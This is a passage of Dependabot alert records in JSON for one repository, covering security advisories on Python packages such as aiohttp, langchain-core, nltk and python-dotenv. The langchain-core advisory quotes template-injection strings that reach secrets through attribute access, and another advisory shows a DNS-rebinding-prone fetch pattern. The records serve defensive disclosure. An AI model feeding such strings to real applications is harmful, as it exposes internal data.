https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311.patch","severity":"medium","identifiers":[{"value":"GHSA-mf9w-mj56-hr94","type":"GHSA"},{"value":"CVE-2026-28684","type":"CVE"}],"references":[{"url":"https://github.com/theskumar/python-dotenv/security/advisories/GHSA-mf9w-mj56-hr94"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-28684"},{"url":"https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311"},{"url":"https://github.com/theskumar/python-dotenv/commit/790c5c02991100aa1bf41ee5330aca75edc51311.patch"},{"url":"https://github.com/theskumar/python-dotenv/releases/tag/v1.2.2"},{"url":"https://github.com/advisories/GHSA-mf9w-mj56-hr94"}],"published_at":"2026-04-21T14:38:57Z","updated_at":"2026-04-21T14:38:59Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-dotenv"},"severity":"medium","vulnerable_version_range":"< 1.2.2","first_patched_version":{"identifier":"1.2.2"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H","score":6.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.0001,"percentile":0.01226},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H","score":6.6},"cwes":[{"cwe_id":"CWE-59","name":"Improper Link Resolution Before File Access ('Link Following')"},{"cwe_id":"CWE-61","name":"UNIX Symbolic Link (Symlink) Following"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-dotenv"},"severity":"medium","vulnerable_version_range":"< 1.2.2","first_patched_version":{"identifier":"1.2.2"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/57","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/57","created_at":"2026-04-30T08:37:38Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":56,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-h8wq-7xc4-p3qx","cve_id":"CVE-2026-0846","summary":"NLTK has Arbitrary File Read via Absolute Path Input in nltk.util.filestring()","description":"A vulnerability in the `filestring()` function of the `nltk.util` module in nltk version 3.9.2 allows arbitrary file read due to improper validation of input paths. The function directly opens files specified by user input without sanitization, enabling attackers to access sensitive system files by providing absolute paths or traversal paths. This vulnerability can be exploited locally or remotely, particularly in scenarios where the function is used in web APIs or other interfaces that accept user-supplied input.","severity":"high","identifiers":[{"value":"GHSA-h8wq-7xc4-p3qx","type":"GHSA"},{"value":"CVE-2026-0846","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-0846"},{"url":"https://huntr.com/bounties/007b84f8-418e-4300-99d0-bf504c2f97eb"},{"url":"https://github.com/nltk/nltk/pull/3485"},{"url":"https://github.com/nltk/nltk/commit/b2e1164bf89277f79b65406c829b99fb20ca1974"},{"url":"https://github.com/advisories/GHSA-h8wq-7xc4-p3qx"}],"published_at":"2026-03-09T21:31:38Z","updated_at":"2026-04-18T01:14:19Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"< 3.9.3","first_patched_version":{"identifier":"3.9.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00084,"percentile":0.24208},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L","score":8.6},"cwes":[{"cwe_id":"CWE-36","name":"Absolute Path Traversal"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"high","vulnerable_version_range":"< 3.9.3","first_patched_version":{"identifier":"3.9.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/56","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/56","created_at":"2026-04-30T08:37:38Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":55,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langchain-openai"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-r7w7-9xr2-qq2r","cve_id":"CVE-2026-41488","summary":"langchain-openai: Image token counting SSRF protection can be bypassed via DNS rebinding","description":"## Summary\n\n`langchain-openai`'s `_url_to_size()` helper (used by `get_num_tokens_from_messages` for image token counting) validated URLs for SSRF protection and then fetched them in a separate network operation with independent DNS resolution. This left a TOCTOU / DNS rebinding window: an attacker-controlled hostname could resolve to a public IP during validation and then to a private/localhost IP during the actual fetch.\n\nThe practical impact is limited because the fetched response body is passed directly to Pillow's `Image.open()` to extract dimensions — the response content is never returned, logged, or otherwise exposed to the caller. An attacker cannot exfiltrate data from internal services through this path. A potential risk is blind probing (inferring whether an internal host/port is open based on timing or error behavior).\n\n## Affected versions\n\n- `langchain-openai` < 1.1.14\n\n## Patched versions\n\n- `langchain-openai` >= 1.1.14 (requires `langchain-core` >= 1.2.31)\n\n## Affected code\n\n**File:** `libs/partners/openai/langchain_openai/chat_models/base.py` — `_url_to_size()`\n\nThe vulnerable pattern was a validate-then-fetch with separate DNS resolution:\n\n```python\nvalidate_safe_url(image_source, allow_private=False, allow_http=True)\n# ... separate network operation with independent DNS resolution ...\nresponse = httpx.get(image_source, timeout=timeout)\n```\n\n## Fix\n\nThe fix replaces the validate-then-fetch pattern with an SSRF-safe httpx transport (`SSRFSafeSyncTransport` from `langchain-core`) that:\n\n- Resolves DNS once and validates all returned IPs against a policy (private ranges, cloud metadata, localhost, k8s internal DNS)\n- Pins the connection to the validated IP, eliminating the DNS rebinding window\n- Disables redirect following to prevent redirect-based SSRF bypasses\n\nThis fix was released in langchain-openai 1.1.14.","severity":"low","identifiers":[{"value":"GHSA-r7w7-9xr2-qq2r","type":"GHSA"},{"value":"CVE-2026-41488","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-r7w7-9xr2-qq2r"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41488"},{"url":"https://github.com/advisories/GHSA-r7w7-9xr2-qq2r"}],"published_at":"2026-04-16T23:00:12Z","updated_at":"2026-04-27T16:33:54Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-openai"},"severity":"low","vulnerable_version_range":"< 1.1.14","first_patched_version":{"identifier":"1.1.14"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","score":3.1},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00024,"percentile":0.06665},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N","score":3.1},"cwes":[{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-openai"},"severity":"low","vulnerable_version_range":"< 1.1.14","first_patched_version":{"identifier":"1.1.14"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/55","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/55","created_at":"2026-04-30T08:37:38Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":54,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langsmith"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-rr7j-v2q5-chgv","cve_id":"CVE-2026-41182","summary":"LangSmith SDK: Streaming token events bypass output redaction","description":"## Summary\n\nThe LangSmith SDK's output redaction controls (hideOutputs in JS, hide_outputs in Python) do not apply to streaming token events. When an LLM run produces streaming output, each chunk is recorded as a new_token event containing the raw token value. These events bypass the redaction pipeline entirely — prepareRunCreateOrUpdateInputs (JS) and _hide_run_outputs (Python) only process the inputs and outputs fields on a run, never the events array. As a result, applications relying on output redaction to prevent sensitive LLM output from being stored in LangSmith will still leak the full streamed content via run events.\n\n## Details\n\n**Both JS and Python SDKs are affected.** The same pattern exists in both:\n\n- **JS SDK**: `traceable.ts:997-1003` and `traceable.ts:1044-1050`\n- **Python SDK**: `run_helpers.py:1924` and `run_helpers.py:1996`\n\nIn both SDKs, `new_token` events with raw `kwargs.token` values are added during streaming, and the redaction pipeline (`hideOutputs` in JS, `hide_outputs` in Python) only processes `inputs`/`outputs` — never `events`.","severity":"medium","identifiers":[{"value":"GHSA-rr7j-v2q5-chgv","type":"GHSA"},{"value":"CVE-2026-41182","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-rr7j-v2q5-chgv"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41182"},{"url":"https://github.com/advisories/GHSA-rr7j-v2q5-chgv"}],"published_at":"2026-04-16T01:20:37Z","updated_at":"2026-04-24T20:52:17Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"npm","name":"langsmith"},"severity":"medium","vulnerable_version_range":"<= 0.5.18","first_patched_version":{"identifier":"0.5.19"}},{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":"<= 0.7.30","first_patched_version":{"identifier":"0.7.31"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00036,"percentile":0.10614},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-200","name":"Exposure of Sensitive Information to an Unauthorized Actor"},{"cwe_id":"CWE-359","name":"Exposure of Private Personal Information to an Unauthorized Actor"},{"cwe_id":"CWE-532","name":"Insertion of Sensitive Information into Log File"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":"<= 0.7.30","first_patched_version":{"identifier":"0.7.31"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/54","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/54","created_at":"2026-04-30T08:37:38Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":53,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"python-multipart"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mj87-hwqh-73pj","cve_id":"CVE-2026-40347","summary":"python-multipart affected by Denial of Service via large multipart preamble or epilogue data","description":"### Summary\n\nA denial of service vulnerability exists when parsing crafted `multipart/form-data` requests with large preamble or epilogue sections.\n\n### Details\n\nTwo inefficient multipart parsing paths could be abused with attacker-controlled input.\n\nBefore the first multipart boundary, the parser handled leading CR and LF bytes inefficiently while searching for the start of the first part. After the closing boundary, the parser continued processing trailing epilogue data instead of discarding it immediately. As a result, parsing time could grow with the size of crafted data placed before the first boundary or after the closing boundary.\n\n### Impact\n\nAn attacker can send oversized malformed multipart bodies that consume excessive CPU time during request parsing, reducing request-handling capacity and delaying legitimate requests. This issue degrades availability but does not typically result in a complete denial of service for the entire application.\n\n### Mitigation\n\nUpgrade to version `0.0.26` or later, which skips ahead to the next boundary candidate when processing leading CR/LF data and immediately discards epilogue data after the closing boundary.","severity":"medium","identifiers":[{"value":"GHSA-mj87-hwqh-73pj","type":"GHSA"},{"value":"CVE-2026-40347","type":"CVE"}],"references":[{"url":"https://github.com/Kludex/python-multipart/security/advisories/GHSA-mj87-hwqh-73pj"},{"url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.26"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40347"},{"url":"https://github.com/advisories/GHSA-mj87-hwqh-73pj"}],"published_at":"2026-04-15T19:45:44Z","updated_at":"2026-04-24T20:51:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"medium","vulnerable_version_range":"< 0.0.26","first_patched_version":{"identifier":"0.0.26"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.0002,"percentile":0.05504},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L","score":5.3},"cwes":[{"cwe_id":"CWE-400","name":"Uncontrolled Resource Consumption"},{"cwe_id":"CWE-834","name":"Excessive Iteration"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"medium","vulnerable_version_range":"< 0.0.26","first_patched_version":{"identifier":"0.0.26"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/53","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/53","created_at":"2026-04-30T08:37:38Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":52,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"pytest"},"manifest_path":"methods/evermemos/uv.lock","scope":"development","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-6w46-j5rx-g56g","cve_id":"CVE-2025-71176","summary":"pytest has vulnerable tmpdir handling","description":"pytest through 9.0.2 on UNIX relies on directories with the `/tmp/pytest-of-{user}` name pattern, which allows local users to cause a denial of service or possibly gain privileges.","severity":"medium","identifiers":[{"value":"GHSA-6w46-j5rx-g56g","type":"GHSA"},{"value":"CVE-2025-71176","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-71176"},{"url":"https://github.com/pytest-dev/pytest/issues/13669"},{"url":"https://www.openwall.com/lists/oss-security/2026/01/21/5"},{"url":"https://github.com/pytest-dev/pytest/pull/14343"},{"url":"https://github.com/pytest-dev/pytest/commit/95d8423bd24992deea5b9df32555fa1741679e2c"},{"url":"https://github.com/pytest-dev/pytest/releases/tag/9.0.3"},{"url":"https://github.com/advisories/GHSA-6w46-j5rx-g56g"}],"published_at":"2026-01-22T06:30:29Z","updated_at":"2026-04-13T16:38:47Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"pytest"},"severity":"medium","vulnerable_version_range":"< 9.0.3","first_patched_version":{"identifier":"9.0.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L","score":6.8},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":6.0e-05,"percentile":0.0025},"cvss":{"vector_string":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L","score":6.8},"cwes":[{"cwe_id":"CWE-379","name":"Creation of Temporary File in Directory with Insecure Permissions"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"pytest"},"severity":"medium","vulnerable_version_range":"< 9.0.3","first_patched_version":{"identifier":"9.0.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/52","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/52","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:10Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:10Z","auto_dismissed_at":null},{"number":51,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-926x-3r5x-gfhw","cve_id":"CVE-2026-40087","summary":"LangChain has incomplete f-string validation in prompt templates","description":"LangChain's f-string prompt-template validation was incomplete in two respects.\n\nFirst, some prompt template classes accepted f-string templates and formatted them without enforcing the same attribute-access validation as `PromptTemplate`. In particular, `DictPromptTemplate` and `ImagePromptTemplate` could accept templates containing attribute access or indexing expressions and subsequently evaluate those expressions during formatting.\n\nExamples of the affected shape include:\n\n```python\n\"{message.additional_kwargs[secret]}\"\n\"https://example.com/{image.__class__.__name__}.png\"\n```\n\nSecond, f-string validation based on parsed top-level field names did not reject nested replacement fields inside format specifiers. For example:\n\n```python\n\"{name:{name.__class__.__name__}}\"\n```\n\nIn this pattern, the nested replacement field appears in the format specifier rather than in the top-level field name. As a result, earlier validation based on parsed field names did not reject the template even though Python formatting would still attempt to resolve the nested expression at runtime.\n\n## Affected usage\n\nThis issue is only relevant for applications that accept untrusted template strings, rather than only untrusted template variable values.\n\nIn addition, practical impact depends on what objects are passed into template formatting:\n\n- If applications only format simple values such as strings and numbers, impact is limited and may only result in formatting errors.\n- If applications format richer Python objects, attribute access and indexing may interact with internal object state during formatting.\n\nIn many deployments, these conditions are not commonly present together. Applications that allow end users to author arbitrary templates often expose only a narrow set of simple template variables, while applications that work with richer internal Python objects often keep template structure under developer control. As a result, the highest-impact scenario is plausible but is not representative of all LangChain applications.\n\nApplications that use hardcoded templates or that only allow users to provide variable values are not affected by this issue.\n\n## Impact\n\nThe direct issue in `DictPromptTemplate` and `ImagePromptTemplate` allowed attribute access and indexing expressions to survive template construction and then be evaluated during formatting. When richer Python objects were passed into formatting, this could expose internal fields or nested data to prompt output, model context, or logs.\n\nThe nested format-spec issue is narrower in scope. It bypassed the intended validation rules for f-string templates, but in simple cases it results in an invalid format specifier error rather than direct disclosure. Accordingly, its practical impact is lower than that of direct top-level attribute traversal.\n\nOverall, the practical severity depends on deployment. Meaningful confidentiality impact requires attacker control over the template structure itself, and higher impact further depends on the surrounding application passing richer internal Python objects into formatting.\n\n## Fix\n\nThe fix consists of two changes.\n\nFirst, LangChain now applies f-string safety validation consistently to `DictPromptTemplate` and `ImagePromptTemplate`, so templates containing attribute access or indexing expressions are rejected during construction and deserialization.\n\nSecond, LangChain now rejects nested replacement fields inside f-string format specifiers.\n\nConcretely, LangChain validates parsed f-string fields and raises an error for:\n\n- variable names containing attribute access or indexing syntax such as `.` or `[]`\n- format specifiers containing `{` or `}`\n\nThis blocks templates such as:\n\n```python\n\"{message.additional_kwargs[secret]}\"\n\"https://example.com/{image.__class__.__name__}.png\"\n\"{name:{name.__class__.__name__}}\"\n```\n\nThe fix preserves ordinary f-string formatting features such as standard format specifiers and conversions, including examples like:\n\n```python\n\"{value:.2f}\"\n\"{value:>10}\"\n\"{value!r}\"\n```\n\nIn addition, the explicit template-validation path now applies the same structural f-string checks before performing placeholder validation, ensuring that the security checks and validation checks remain aligned.","severity":"medium","identifiers":[{"value":"GHSA-926x-3r5x-gfhw","type":"GHSA"},{"value":"CVE-2026-40087","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-926x-3r5x-gfhw"},{"url":"https://github.com/langchain-ai/langchain/pull/36612"},{"url":"https://github.com/langchain-ai/langchain/pull/36613"},{"url":"https://github.com/langchain-ai/langchain/commit/6bab0ba3c12328008ddca3e0d54ff5a6151cd27b"},{"url":"https://github.com/langchain-ai/langchain/commit/af2ed47c6f008cdd551f3c0d87db3774c8dfe258"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D0.3.84"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.28"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-40087"},{"url":"https://github.com/advisories/GHSA-926x-3r5x-gfhw"}],"published_at":"2026-04-08T21:51:32Z","updated_at":"2026-04-10T14:41:46Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"medium","vulnerable_version_range":"< 0.3.83","first_patched_version":{"identifier":"0.3.84"}},{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"medium","vulnerable_version_range":">= 1.0.0a1, < 1.2.28","first_patched_version":{"identifier":"1.2.28"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00055,"percentile":0.17055},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","score":5.3},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"},{"cwe_id":"CWE-1336","name":"Improper Neutralization of Special Elements Used in a Template Engine"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"medium","vulnerable_version_range":">= 1.0.0a1, < 1.2.28","first_patched_version":{"identifier":"1.2.28"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/51","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/51","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":50,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-c427-h43c-vf67","cve_id":"CVE-2026-34525","summary":"AIOHTTP accepts duplicate Host headers","description":"### Summary\n\nMultiple Host headers were allowed in aiohttp.\n\n### Impact\n\nMostly this doesn't affect aiohttp security itself, but if a reverse proxy is applying security rules depending on the target Host, it is theoretically possible that the proxy and aiohttp could process different host names, possibly resulting in bypassing a security check on the proxy and getting a request processed by aiohttp in a privileged sub app when using `Application.add_domain()`.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349\nPatch: https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000","severity":"medium","identifiers":[{"value":"GHSA-c427-h43c-vf67","type":"GHSA"},{"value":"CVE-2026-34525","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-c427-h43c-vf67"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34525"},{"url":"https://github.com/aio-libs/aiohttp/commit/53e2e6fc58b89c6185be7820bd2c9f40216b3000"},{"url":"https://github.com/aio-libs/aiohttp/commit/e00ca3cca92c465c7913c4beb763a72da9ed8349"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-c427-h43c-vf67"}],"published_at":"2026-04-01T21:49:45Z","updated_at":"2026-04-01T21:49:46Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:N","score":6.3}},"epss":{"percentage":0.0013,"percentile":0.3204},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-20","name":"Improper Input Validation"},{"cwe_id":"CWE-444","name":"Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"medium","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/50","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/50","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":49,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-63hf-3vf5-4wqf","cve_id":"CVE-2026-34520","summary":"AIOHTTP's C parser (llhttp) accepts null bytes and control characters in response header values - header injection/security bypass","description":"### Summary\n\nThe C parser (the default for most installs) accepted null bytes and control characters is response headers.\n\n### Impact\n\nAn attacker could send header values that are interpreted differently than expected due to the presence of control characters. For example, `request.url.origin()` may return a different value than the raw Host header, or what a reverse proxy interpreted it as., potentially resulting in some kind of security bypass.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/9370b9714a7a56003cacd31a9b4ae16eab109ba4","severity":"low","identifiers":[{"value":"GHSA-63hf-3vf5-4wqf","type":"GHSA"},{"value":"CVE-2026-34520","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-63hf-3vf5-4wqf"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34520"},{"url":"https://github.com/aio-libs/aiohttp/commit/9370b9714a7a56003cacd31a9b4ae16eab109ba4"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-63hf-3vf5-4wqf"}],"published_at":"2026-04-01T21:49:06Z","updated_at":"2026-04-06T23:12:12Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H","score":9.1},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U","score":2.7}},"epss":{"percentage":0.00063,"percentile":0.19232},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H","score":9.1},"cwes":[{"cwe_id":"CWE-113","name":"Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 3.13.3","first_patched_version":{"identifier":"3.13.4"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/49","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/49","created_at":"2026-04-30T08:37:37Z","updated_at":"2026-05-13T05:27:09Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:09Z","auto_dismissed_at":null},{"number":48,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"aiohttp"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-mwh4-6h8g-pg8w","cve_id":"CVE-2026-34519","summary":"AIOHTTP has HTTP response splitting via \\r in reason phrase","description":"### Summary\n\nAn attacker who controls the `reason` parameter when creating a `Response` may be able to inject extra headers or similar exploits.\n\n### Impact\n\nIn the unlikely situation that an application allows untrusted data to be used in the response's `reason` parameter, then an attacker could manipulate the response to send something different from what the developer intended.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b","severity":"low","identifiers":[{"value":"GHSA-mwh4-6h8g-pg8w","type":"GHSA"},{"value":"CVE-2026-34519","type":"CVE"}],"references":[{"url":"https://github.com/aio-libs/aiohttp/security/advisories/GHSA-mwh4-6h8g-pg8w"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34519"},{"url":"https://github.com/aio-libs/aiohttp/commit/53b35a2f8869c37a133e60bf1a82a1c01642ba2b"},{"url":"https://github.com/aio-libs/aiohttp/releases/tag/v3.13.4"},{"url":"https://github.com/advisories/GHSA-mwh4-6h8g-pg8w"}],"published_at":"2026-04-01T21:48:24Z","updated_at":"2026-04-01T21:48:25Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"aiohttp"},"severity":"low","vulnerable_version_range":"<= 